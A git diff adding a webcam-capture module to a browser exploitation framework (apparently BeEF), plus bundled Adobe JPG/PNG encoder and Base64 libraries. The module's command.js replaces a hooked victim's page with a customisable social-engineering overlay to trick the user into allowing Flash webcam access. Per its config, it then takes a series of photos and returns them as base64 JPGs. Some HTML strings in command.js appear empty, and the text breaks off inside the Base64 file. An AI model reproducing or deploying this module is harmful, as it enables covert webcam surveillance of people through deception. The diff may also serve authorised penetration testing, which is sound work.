diff --git a/modules/browser/webcam/command.js b/modules/browser/webcam/command.js new file mode 100644 index 000000000..9ed0f73a5 --- /dev/null +++ b/modules/browser/webcam/command.js @@ -0,0 +1,70 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// + + +beef.execute(function() { + + /* + If you ever experience that the "Allow button" of the flash warning is not clickable, it can have several reasons: + - Some CSS/Flash bug: http://stackoverflow.com/questions/3003724/cant-click-allow-button-in-flash-on-firefox + - There is a bug in flash: http://forums.adobe.com/thread/880967 + - You overlayed (a single pixel is enough) the warning message with something (e.g. a div). Try to not include the + body_social_engineer_and_overlay below and try again. + */ + + + //The social engineering message and the overlay div's + var body_social_engineer_and_overlay = '

<%= @social_engineering_title %>

<%= @social_engineering_text %>

'; + + + //These 4 function names [noCamera(), noCamera(), pressedDisallow(), pictureCallback(picture), allPicturesTaken()] are hard coded in the swf actionscript3. Flash will invoke these functions directly. The picture for the pictureCallback function will be a base64 encoded JPG string + var js_functions = ''; + + + //Either do the overlay (body_social_engineer_and_overlay) or do something like in the next line (showing a message if adobe flash is not installed) + //We'll notice when flash is not installed anyway... + //var body_flash_container = '

You need FlashPlayer 9 or higher!

Get Adobe Flash player

'; + var body_flash_container = '
'; + + + //The style is the only thing we already append to the head + var theHead = document.getElementsByTagName("head")[0]; + var style = document.createElement('style'); + style.type = 'text/css'; + style.innerHTML = 'body { background: #eee; } .thingy { z-index:50; background-color:#eee; border:1px solid #eee; }'; + theHead.appendChild(style); + + //A nice library that helps us to include the swf file + var swfobject_script = '' + + //This is the javascript that actually calls the swfobject library to include the swf file + var include_script = ''; + + //Empty body first + $j('body').html(''); + //Now show our flash stuff, muahahaha + $j('body').append(js_functions, swfobject_script, body_flash_container, body_social_engineer_and_overlay, include_script); + +}); + + + + + diff --git a/modules/browser/webcam/config.yaml b/modules/browser/webcam/config.yaml new file mode 100644 index 000000000..98cf7bba3 --- /dev/null +++ b/modules/browser/webcam/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + webcam: + enable: true + category: "Browser" + name: "Webcam" + description: "This module will show the Adobe Flash allow webcam dialog to the user. The user has to click the allow button, otherwise this module will not return pictures. The title/text to convince the user can be customised. You can customise how many pictures you want to take and in which interval (default will take 20 pictures, 1 picture per second). The picture is sent as a base64 encoded JPG string." + authors: ["floyd @floyd_ch"] + target: + working: ["All"] diff --git a/modules/browser/webcam/dev/com/adobe/images/BitString.as b/modules/browser/webcam/dev/com/adobe/images/BitString.as new file mode 100755 index 000000000..b5c2b8410 --- /dev/null +++ b/modules/browser/webcam/dev/com/adobe/images/BitString.as @@ -0,0 +1,39 @@ +/* + Copyright (c) 2008, Adobe Systems Incorporated + All rights reserved. + + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions are + met: + + * Redistributions of source code must retain the above copyright notice, + this list of conditions and the following disclaimer. + + * Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + * Neither the name of Adobe Systems Incorporated nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + + THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS + IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, + THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR + PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR + CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, + EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, + PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR + PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF + LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING + NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS + SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +*/ +package com.adobe.images +{ + public class BitString + { + public var len:int = 0; + public var val:int = 0; + } +} \ No newline at end of file diff --git a/modules/browser/webcam/dev/com/adobe/images/JPGEncoder.as b/modules/browser/webcam/dev/com/adobe/images/JPGEncoder.as new file mode 100755 index 000000000..100d7e968 --- /dev/null +++ b/modules/browser/webcam/dev/com/adobe/images/JPGEncoder.as @@ -0,0 +1,648 @@ +/* + Copyright (c) 2008, Adobe Systems Incorporated + All rights reserved. + + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions are + met: + + * Redistributions of source code must retain the above copyright notice, + this list of conditions and the following disclaimer. + + * Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + * Neither the name of Adobe Systems Incorporated nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + + THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS + IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, + THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR + PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR + CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, + EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, + PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR + PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF + LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING + NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS + SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +*/ +package com.adobe.images +{ + import flash.geom.*; + import flash.display.*; + import flash.utils.*; + + /** + * Class that converts BitmapData into a valid JPEG + */ + public class JPGEncoder + { + + // Static table initialization + + private var ZigZag:Array = [ + 0, 1, 5, 6,14,15,27,28, + 2, 4, 7,13,16,26,29,42, + 3, 8,12,17,25,30,41,43, + 9,11,18,24,31,40,44,53, + 10,19,23,32,39,45,52,54, + 20,22,33,38,46,51,55,60, + 21,34,37,47,50,56,59,61, + 35,36,48,49,57,58,62,63 + ]; + + private var YTable:Array = new Array(64); + private var UVTable:Array = new Array(64); + private var fdtbl_Y:Array = new Array(64); + private var fdtbl_UV:Array = new Array(64); + + private function initQuantTables(sf:int):void + { + var i:int; + var t:Number; + var YQT:Array = [ + 16, 11, 10, 16, 24, 40, 51, 61, + 12, 12, 14, 19, 26, 58, 60, 55, + 14, 13, 16, 24, 40, 57, 69, 56, + 14, 17, 22, 29, 51, 87, 80, 62, + 18, 22, 37, 56, 68,109,103, 77, + 24, 35, 55, 64, 81,104,113, 92, + 49, 64, 78, 87,103,121,120,101, + 72, 92, 95, 98,112,100,103, 99 + ]; + for (i = 0; i < 64; i++) { + t = Math.floor((YQT[i]*sf+50)/100); + if (t < 1) { + t = 1; + } else if (t > 255) { + t = 255; + } + YTable[ZigZag[i]] = t; + } + var UVQT:Array = [ + 17, 18, 24, 47, 99, 99, 99, 99, + 18, 21, 26, 66, 99, 99, 99, 99, + 24, 26, 56, 99, 99, 99, 99, 99, + 47, 66, 99, 99, 99, 99, 99, 99, + 99, 99, 99, 99, 99, 99, 99, 99, + 99, 99, 99, 99, 99, 99, 99, 99, + 99, 99, 99, 99, 99, 99, 99, 99, + 99, 99, 99, 99, 99, 99, 99, 99 + ]; + for (i = 0; i < 64; i++) { + t = Math.floor((UVQT[i]*sf+50)/100); + if (t < 1) { + t = 1; + } else if (t > 255) { + t = 255; + } + UVTable[ZigZag[i]] = t; + } + var aasf:Array = [ + 1.0, 1.387039845, 1.306562965, 1.175875602, + 1.0, 0.785694958, 0.541196100, 0.275899379 + ]; + i = 0; + for (var row:int = 0; row < 8; row++) + { + for (var col:int = 0; col < 8; col++) + { + fdtbl_Y[i] = (1.0 / (YTable [ZigZag[i]] * aasf[row] * aasf[col] * 8.0)); + fdtbl_UV[i] = (1.0 / (UVTable[ZigZag[i]] * aasf[row] * aasf[col] * 8.0)); + i++; + } + } + } + + private var YDC_HT:Array; + private var UVDC_HT:Array; + private var YAC_HT:Array; + private var UVAC_HT:Array; + + private function computeHuffmanTbl(nrcodes:Array, std_table:Array):Array + { + var codevalue:int = 0; + var pos_in_table:int = 0; + var HT:Array = new Array(); + for (var k:int=1; k<=16; k++) { + for (var j:int=1; j<=nrcodes[k]; j++) { + HT[std_table[pos_in_table]] = new BitString(); + HT[std_table[pos_in_table]].val = codevalue; + HT[std_table[pos_in_table]].len = k; + pos_in_table++; + codevalue++; + } + codevalue*=2; + } + return HT; + } + + private var std_dc_luminance_nrcodes:Array = [0,0,1,5,1,1,1,1,1,1,0,0,0,0,0,0,0]; + private var std_dc_luminance_values:Array = [0,1,2,3,4,5,6,7,8,9,10,11]; + private var std_ac_luminance_nrcodes:Array = [0,0,2,1,3,3,2,4,3,5,5,4,4,0,0,1,0x7d]; + private var std_ac_luminance_values:Array = [ + 0x01,0x02,0x03,0x00,0x04,0x11,0x05,0x12, + 0x21,0x31,0x41,0x06,0x13,0x51,0x61,0x07, + 0x22,0x71,0x14,0x32,0x81,0x91,0xa1,0x08, + 0x23,0x42,0xb1,0xc1,0x15,0x52,0xd1,0xf0, + 0x24,0x33,0x62,0x72,0x82,0x09,0x0a,0x16, + 0x17,0x18,0x19,0x1a,0x25,0x26,0x27,0x28, + 0x29,0x2a,0x34,0x35,0x36,0x37,0x38,0x39, + 0x3a,0x43,0x44,0x45,0x46,0x47,0x48,0x49, + 0x4a,0x53,0x54,0x55,0x56,0x57,0x58,0x59, + 0x5a,0x63,0x64,0x65,0x66,0x67,0x68,0x69, + 0x6a,0x73,0x74,0x75,0x76,0x77,0x78,0x79, + 0x7a,0x83,0x84,0x85,0x86,0x87,0x88,0x89, + 0x8a,0x92,0x93,0x94,0x95,0x96,0x97,0x98, + 0x99,0x9a,0xa2,0xa3,0xa4,0xa5,0xa6,0xa7, + 0xa8,0xa9,0xaa,0xb2,0xb3,0xb4,0xb5,0xb6, + 0xb7,0xb8,0xb9,0xba,0xc2,0xc3,0xc4,0xc5, + 0xc6,0xc7,0xc8,0xc9,0xca,0xd2,0xd3,0xd4, + 0xd5,0xd6,0xd7,0xd8,0xd9,0xda,0xe1,0xe2, + 0xe3,0xe4,0xe5,0xe6,0xe7,0xe8,0xe9,0xea, + 0xf1,0xf2,0xf3,0xf4,0xf5,0xf6,0xf7,0xf8, + 0xf9,0xfa + ]; + + private var std_dc_chrominance_nrcodes:Array = [0,0,3,1,1,1,1,1,1,1,1,1,0,0,0,0,0]; + private var std_dc_chrominance_values:Array = [0,1,2,3,4,5,6,7,8,9,10,11]; + private var std_ac_chrominance_nrcodes:Array = [0,0,2,1,2,4,4,3,4,7,5,4,4,0,1,2,0x77]; + private var std_ac_chrominance_values:Array = [ + 0x00,0x01,0x02,0x03,0x11,0x04,0x05,0x21, + 0x31,0x06,0x12,0x41,0x51,0x07,0x61,0x71, + 0x13,0x22,0x32,0x81,0x08,0x14,0x42,0x91, + 0xa1,0xb1,0xc1,0x09,0x23,0x33,0x52,0xf0, + 0x15,0x62,0x72,0xd1,0x0a,0x16,0x24,0x34, + 0xe1,0x25,0xf1,0x17,0x18,0x19,0x1a,0x26, + 0x27,0x28,0x29,0x2a,0x35,0x36,0x37,0x38, + 0x39,0x3a,0x43,0x44,0x45,0x46,0x47,0x48, + 0x49,0x4a,0x53,0x54,0x55,0x56,0x57,0x58, + 0x59,0x5a,0x63,0x64,0x65,0x66,0x67,0x68, + 0x69,0x6a,0x73,0x74,0x75,0x76,0x77,0x78, + 0x79,0x7a,0x82,0x83,0x84,0x85,0x86,0x87, + 0x88,0x89,0x8a,0x92,0x93,0x94,0x95,0x96, + 0x97,0x98,0x99,0x9a,0xa2,0xa3,0xa4,0xa5, + 0xa6,0xa7,0xa8,0xa9,0xaa,0xb2,0xb3,0xb4, + 0xb5,0xb6,0xb7,0xb8,0xb9,0xba,0xc2,0xc3, + 0xc4,0xc5,0xc6,0xc7,0xc8,0xc9,0xca,0xd2, + 0xd3,0xd4,0xd5,0xd6,0xd7,0xd8,0xd9,0xda, + 0xe2,0xe3,0xe4,0xe5,0xe6,0xe7,0xe8,0xe9, + 0xea,0xf2,0xf3,0xf4,0xf5,0xf6,0xf7,0xf8, + 0xf9,0xfa + ]; + + private function initHuffmanTbl():void + { + YDC_HT = computeHuffmanTbl(std_dc_luminance_nrcodes,std_dc_luminance_values); + UVDC_HT = computeHuffmanTbl(std_dc_chrominance_nrcodes,std_dc_chrominance_values); + YAC_HT = computeHuffmanTbl(std_ac_luminance_nrcodes,std_ac_luminance_values); + UVAC_HT = computeHuffmanTbl(std_ac_chrominance_nrcodes,std_ac_chrominance_values); + } + + private var bitcode:Array = new Array(65535); + private var category:Array = new Array(65535); + + private function initCategoryNumber():void + { + var nrlower:int = 1; + var nrupper:int = 2; + var nr:int; + for (var cat:int=1; cat<=15; cat++) { + //Positive numbers + for (nr=nrlower; nr= 0 ) { + if (value & uint(1 << posval) ) { + bytenew |= uint(1 << bytepos); + } + posval--; + bytepos--; + if (bytepos < 0) { + if (bytenew == 0xFF) { + writeByte(0xFF); + writeByte(0); + } + else { + writeByte(bytenew); + } + bytepos=7; + bytenew=0; + } + } + } + + private function writeByte(value:int):void + { + byteout.writeByte(value); + } + + private function writeWord(value:int):void + { + writeByte((value>>8)&0xFF); + writeByte((value )&0xFF); + } + + // DCT & quantization core + + private function fDCTQuant(data:Array, fdtbl:Array):Array + { + var tmp0:Number, tmp1:Number, tmp2:Number, tmp3:Number, tmp4:Number, tmp5:Number, tmp6:Number, tmp7:Number; + var tmp10:Number, tmp11:Number, tmp12:Number, tmp13:Number; + var z1:Number, z2:Number, z3:Number, z4:Number, z5:Number, z11:Number, z13:Number; + var i:int; + /* Pass 1: process rows. */ + var dataOff:int=0; + for (i=0; i<8; i++) { + tmp0 = data[dataOff+0] + data[dataOff+7]; + tmp7 = data[dataOff+0] - data[dataOff+7]; + tmp1 = data[dataOff+1] + data[dataOff+6]; + tmp6 = data[dataOff+1] - data[dataOff+6]; + tmp2 = data[dataOff+2] + data[dataOff+5]; + tmp5 = data[dataOff+2] - data[dataOff+5]; + tmp3 = data[dataOff+3] + data[dataOff+4]; + tmp4 = data[dataOff+3] - data[dataOff+4]; + + /* Even part */ + tmp10 = tmp0 + tmp3; /* phase 2 */ + tmp13 = tmp0 - tmp3; + tmp11 = tmp1 + tmp2; + tmp12 = tmp1 - tmp2; + + data[dataOff+0] = tmp10 + tmp11; /* phase 3 */ + data[dataOff+4] = tmp10 - tmp11; + + z1 = (tmp12 + tmp13) * 0.707106781; /* c4 */ + data[dataOff+2] = tmp13 + z1; /* phase 5 */ + data[dataOff+6] = tmp13 - z1; + + /* Odd part */ + tmp10 = tmp4 + tmp5; /* phase 2 */ + tmp11 = tmp5 + tmp6; + tmp12 = tmp6 + tmp7; + + /* The rotator is modified from fig 4-8 to avoid extra negations. */ + z5 = (tmp10 - tmp12) * 0.382683433; /* c6 */ + z2 = 0.541196100 * tmp10 + z5; /* c2-c6 */ + z4 = 1.306562965 * tmp12 + z5; /* c2+c6 */ + z3 = tmp11 * 0.707106781; /* c4 */ + + z11 = tmp7 + z3; /* phase 5 */ + z13 = tmp7 - z3; + + data[dataOff+5] = z13 + z2; /* phase 6 */ + data[dataOff+3] = z13 - z2; + data[dataOff+1] = z11 + z4; + data[dataOff+7] = z11 - z4; + + dataOff += 8; /* advance pointer to next row */ + } + + /* Pass 2: process columns. */ + dataOff = 0; + for (i=0; i<8; i++) { + tmp0 = data[dataOff+ 0] + data[dataOff+56]; + tmp7 = data[dataOff+ 0] - data[dataOff+56]; + tmp1 = data[dataOff+ 8] + data[dataOff+48]; + tmp6 = data[dataOff+ 8] - data[dataOff+48]; + tmp2 = data[dataOff+16] + data[dataOff+40]; + tmp5 = data[dataOff+16] - data[dataOff+40]; + tmp3 = data[dataOff+24] + data[dataOff+32]; + tmp4 = data[dataOff+24] - data[dataOff+32]; + + /* Even part */ + tmp10 = tmp0 + tmp3; /* phase 2 */ + tmp13 = tmp0 - tmp3; + tmp11 = tmp1 + tmp2; + tmp12 = tmp1 - tmp2; + + data[dataOff+ 0] = tmp10 + tmp11; /* phase 3 */ + data[dataOff+32] = tmp10 - tmp11; + + z1 = (tmp12 + tmp13) * 0.707106781; /* c4 */ + data[dataOff+16] = tmp13 + z1; /* phase 5 */ + data[dataOff+48] = tmp13 - z1; + + /* Odd part */ + tmp10 = tmp4 + tmp5; /* phase 2 */ + tmp11 = tmp5 + tmp6; + tmp12 = tmp6 + tmp7; + + /* The rotator is modified from fig 4-8 to avoid extra negations. */ + z5 = (tmp10 - tmp12) * 0.382683433; /* c6 */ + z2 = 0.541196100 * tmp10 + z5; /* c2-c6 */ + z4 = 1.306562965 * tmp12 + z5; /* c2+c6 */ + z3 = tmp11 * 0.707106781; /* c4 */ + + z11 = tmp7 + z3; /* phase 5 */ + z13 = tmp7 - z3; + + data[dataOff+40] = z13 + z2; /* phase 6 */ + data[dataOff+24] = z13 - z2; + data[dataOff+ 8] = z11 + z4; + data[dataOff+56] = z11 - z4; + + dataOff++; /* advance pointer to next column */ + } + + // Quantize/descale the coefficients + for (i=0; i<64; i++) { + // Apply the quantization and scaling factor & Round to nearest integer + data[i] = Math.round((data[i]*fdtbl[i])); + } + return data; + } + + // Chunk writing + + private function writeAPP0():void + { + writeWord(0xFFE0); // marker + writeWord(16); // length + writeByte(0x4A); // J + writeByte(0x46); // F + writeByte(0x49); // I + writeByte(0x46); // F + writeByte(0); // = "JFIF",'\0' + writeByte(1); // versionhi + writeByte(1); // versionlo + writeByte(0); // xyunits + writeWord(1); // xdensity + writeWord(1); // ydensity + writeByte(0); // thumbnwidth + writeByte(0); // thumbnheight + } + + private function writeSOF0(width:int, height:int):void + { + writeWord(0xFFC0); // marker + writeWord(17); // length, truecolor YUV JPG + writeByte(8); // precision + writeWord(height); + writeWord(width); + writeByte(3); // nrofcomponents + writeByte(1); // IdY + writeByte(0x11); // HVY + writeByte(0); // QTY + writeByte(2); // IdU + writeByte(0x11); // HVU + writeByte(1); // QTU + writeByte(3); // IdV + writeByte(0x11); // HVV + writeByte(1); // QTV + } + + private function writeDQT():void + { + writeWord(0xFFDB); // marker + writeWord(132); // length + writeByte(0); + var i:int; + for (i=0; i<64; i++) { + writeByte(YTable[i]); + } + writeByte(1); + for (i=0; i<64; i++) { + writeByte(UVTable[i]); + } + } + + private function writeDHT():void + { + writeWord(0xFFC4); // marker + writeWord(0x01A2); // length + var i:int; + + writeByte(0); // HTYDCinfo + for (i=0; i<16; i++) { + writeByte(std_dc_luminance_nrcodes[i+1]); + } + for (i=0; i<=11; i++) { + writeByte(std_dc_luminance_values[i]); + } + + writeByte(0x10); // HTYACinfo + for (i=0; i<16; i++) { + writeByte(std_ac_luminance_nrcodes[i+1]); + } + for (i=0; i<=161; i++) { + writeByte(std_ac_luminance_values[i]); + } + + writeByte(1); // HTUDCinfo + for (i=0; i<16; i++) { + writeByte(std_dc_chrominance_nrcodes[i+1]); + } + for (i=0; i<=11; i++) { + writeByte(std_dc_chrominance_values[i]); + } + + writeByte(0x11); // HTUACinfo + for (i=0; i<16; i++) { + writeByte(std_ac_chrominance_nrcodes[i+1]); + } + for (i=0; i<=161; i++) { + writeByte(std_ac_chrominance_values[i]); + } + } + + private function writeSOS():void + { + writeWord(0xFFDA); // marker + writeWord(12); // length + writeByte(3); // nrofcomponents + writeByte(1); // IdY + writeByte(0); // HTY + writeByte(2); // IdU + writeByte(0x11); // HTU + writeByte(3); // IdV + writeByte(0x11); // HTV + writeByte(0); // Ss + writeByte(0x3f); // Se + writeByte(0); // Bf + } + + // Core processing + private var DU:Array = new Array(64); + + private function processDU(CDU:Array, fdtbl:Array, DC:Number, HTDC:Array, HTAC:Array):Number + { + var EOB:BitString = HTAC[0x00]; + var M16zeroes:BitString = HTAC[0xF0]; + var i:int; + + var DU_DCT:Array = fDCTQuant(CDU, fdtbl); + //ZigZag reorder + for (i=0;i<64;i++) { + DU[ZigZag[i]]=DU_DCT[i]; + } + var Diff:int = DU[0] - DC; DC = DU[0]; + //Encode DC + if (Diff==0) { + writeBits(HTDC[0]); // Diff might be 0 + } else { + writeBits(HTDC[category[32767+Diff]]); + writeBits(bitcode[32767+Diff]); + } + //Encode ACs + var end0pos:int = 63; + for (; (end0pos>0)&&(DU[end0pos]==0); end0pos--) { + }; + //end0pos = first element in reverse order !=0 + if ( end0pos == 0) { + writeBits(EOB); + return DC; + } + i = 1; + while ( i <= end0pos ) { + var startpos:int = i; + for (; (DU[i]==0) && (i<=end0pos); i++) { + } + var nrzeroes:int = i-startpos; + if ( nrzeroes >= 16 ) { + for (var nrmarker:int=1; nrmarker <= nrzeroes/16; nrmarker++) { + writeBits(M16zeroes); + } + nrzeroes = int(nrzeroes&0xF); + } + writeBits(HTAC[nrzeroes*16+category[32767+DU[i]]]); + writeBits(bitcode[32767+DU[i]]); + i++; + } + if ( end0pos != 63 ) { + writeBits(EOB); + } + return DC; + } + + private var YDU:Array = new Array(64); + private var UDU:Array = new Array(64); + private var VDU:Array = new Array(64); + + private function RGB2YUV(img:BitmapData, xpos:int, ypos:int):void + { + var pos:int=0; + for (var y:int=0; y<8; y++) { + for (var x:int=0; x<8; x++) { + var P:uint = img.getPixel32(xpos+x,ypos+y); + var R:Number = Number((P>>16)&0xFF); + var G:Number = Number((P>> 8)&0xFF); + var B:Number = Number((P )&0xFF); + YDU[pos]=((( 0.29900)*R+( 0.58700)*G+( 0.11400)*B))-128; + UDU[pos]=(((-0.16874)*R+(-0.33126)*G+( 0.50000)*B)); + VDU[pos]=((( 0.50000)*R+(-0.41869)*G+(-0.08131)*B)); + pos++; + } + } + } + + /** + * Constructor for JPEGEncoder class + * + * @param quality The quality level between 1 and 100 that detrmines the + * level of compression used in the generated JPEG + * @langversion ActionScript 3.0 + * @playerversion Flash 9.0 + * @tiptext + */ + public function JPGEncoder(quality:Number = 50) + { + if (quality <= 0) { + quality = 1; + } + if (quality > 100) { + quality = 100; + } + var sf:int = 0; + if (quality < 50) { + sf = int(5000 / quality); + } else { + sf = int(200 - quality*2); + } + // Create tables + initHuffmanTbl(); + initCategoryNumber(); + initQuantTables(sf); + } + + /** + * Created a JPEG image from the specified BitmapData + * + * @param image The BitmapData that will be converted into the JPEG format. + * @return a ByteArray representing the JPEG encoded image data. + * @langversion ActionScript 3.0 + * @playerversion Flash 9.0 + * @tiptext + */ + public function encode(image:BitmapData):ByteArray + { + // Initialize bit writer + byteout = new ByteArray(); + bytenew=0; + bytepos=7; + + // Add JPEG headers + writeWord(0xFFD8); // SOI + writeAPP0(); + writeDQT(); + writeSOF0(image.width,image.height); + writeDHT(); + writeSOS(); + + + // Encode 8x8 macroblocks + var DCY:Number=0; + var DCU:Number=0; + var DCV:Number=0; + bytenew=0; + bytepos=7; + for (var ypos:int=0; ypos= 0 ) { + var fillbits:BitString = new BitString(); + fillbits.len = bytepos+1; + fillbits.val = (1<<(bytepos+1))-1; + writeBits(fillbits); + } + + writeWord(0xFFD9); //EOI + return byteout; + } + } +} diff --git a/modules/browser/webcam/dev/com/adobe/images/PNGEncoder.as b/modules/browser/webcam/dev/com/adobe/images/PNGEncoder.as new file mode 100755 index 000000000..83c95f629 --- /dev/null +++ b/modules/browser/webcam/dev/com/adobe/images/PNGEncoder.as @@ -0,0 +1,141 @@ +/* + Copyright (c) 2008, Adobe Systems Incorporated + All rights reserved. + + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions are + met: + + * Redistributions of source code must retain the above copyright notice, + this list of conditions and the following disclaimer. + + * Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + * Neither the name of Adobe Systems Incorporated nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + + THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS + IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, + THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR + PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR + CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, + EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, + PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR + PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF + LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING + NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS + SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +*/ +package com.adobe.images +{ + import flash.geom.*; + import flash.display.Bitmap; + import flash.display.BitmapData; + import flash.utils.ByteArray; + + /** + * Class that converts BitmapData into a valid PNG + */ + public class PNGEncoder + { + /** + * Created a PNG image from the specified BitmapData + * + * @param image The BitmapData that will be converted into the PNG format. + * @return a ByteArray representing the PNG encoded image data. + * @langversion ActionScript 3.0 + * @playerversion Flash 9.0 + * @tiptext + */ + public static function encode(img:BitmapData):ByteArray { + // Create output byte array + var png:ByteArray = new ByteArray(); + // Write PNG signature + png.writeUnsignedInt(0x89504e47); + png.writeUnsignedInt(0x0D0A1A0A); + // Build IHDR chunk + var IHDR:ByteArray = new ByteArray(); + IHDR.writeInt(img.width); + IHDR.writeInt(img.height); + IHDR.writeUnsignedInt(0x08060000); // 32bit RGBA + IHDR.writeByte(0); + writeChunk(png,0x49484452,IHDR); + // Build IDAT chunk + var IDAT:ByteArray= new ByteArray(); + for(var i:int=0;i < img.height;i++) { + // no filter + IDAT.writeByte(0); + var p:uint; + var j:int; + if ( !img.transparent ) { + for(j=0;j < img.width;j++) { + p = img.getPixel(j,i); + IDAT.writeUnsignedInt( + uint(((p&0xFFFFFF) << 8)|0xFF)); + } + } else { + for(j=0;j < img.width;j++) { + p = img.getPixel32(j,i); + IDAT.writeUnsignedInt( + uint(((p&0xFFFFFF) << 8)| + (p>>>24))); + } + } + } + IDAT.compress(); + writeChunk(png,0x49444154,IDAT); + // Build IEND chunk + writeChunk(png,0x49454E44,null); + // return PNG + return png; + } + + private static var crcTable:Array; + private static var crcTableComputed:Boolean = false; + + private static function writeChunk(png:ByteArray, + type:uint, data:ByteArray):void { + if (!crcTableComputed) { + crcTableComputed = true; + crcTable = []; + var c:uint; + for (var n:uint = 0; n < 256; n++) { + c = n; + for (var k:uint = 0; k < 8; k++) { + if (c & 1) { + c = uint(uint(0xedb88320) ^ + uint(c >>> 1)); + } else { + c = uint(c >>> 1); + } + } + crcTable[n] = c; + } + } + var len:uint = 0; + if (data != null) { + len = data.length; + } + png.writeUnsignedInt(len); + var p:uint = png.position; + png.writeUnsignedInt(type); + if ( data != null ) { + png.writeBytes(data); + } + var e:uint = png.position; + png.position = p; + c = 0xffffffff; + for (var i:int = 0; i < (e-p); i++) { + c = uint(crcTable[ + (c ^ png.readUnsignedByte()) & + uint(0xff)] ^ uint(c >>> 8)); + } + c = uint(c^uint(0xffffffff)); + png.position = e; + png.writeUnsignedInt(c); + } + } +} \ No newline at end of file diff --git a/modules/browser/webcam/dev/com/foxarc/util/Base64.as b/modules/browser/webcam/dev/com/foxarc/util/Base64.as new file mode 100644 index 000000000..fe7d0cd1f --- /dev/null +++ b/modules/browser/webcam/dev/com/foxarc/util/Base64.as @@ -0,0 +1,106 @@ +package com.foxarc.util{ + import flash.utils.ByteArray; + public class Base64 { + private static const encodeChars:Array = + ['A','B','C','D','E','F','G','H', + 'I','J','K','L','M','N','O','P', + 'Q','R','S','T','U','V','W','X', + 'Y','Z','a','b','c','d','e','f', + 'g','h','i','j','k','l','m','n', + 'o','p','q','r','s','t','u','v', + 'w','x','y','z','0','1','2','3', + '4','5','6','7','8','9','+','/']; + private static const decodeChars:Array = + [-1, -1, -1, -1, -1, -1, -1, -1, + -1, -1, -1, -1, -1, -1, -1, -1, + -1, -1, -1, -1, -1, -1, -1, -1, + -1, -1, -1, -1, -1, -1, -1, -1, + -1, -1, -1, -1, -1, -1, -1, -1, + -1, -1, -1, 62, -1, -1, -1, 63, + 52, 53, 54, 55, 56, 57, 58, 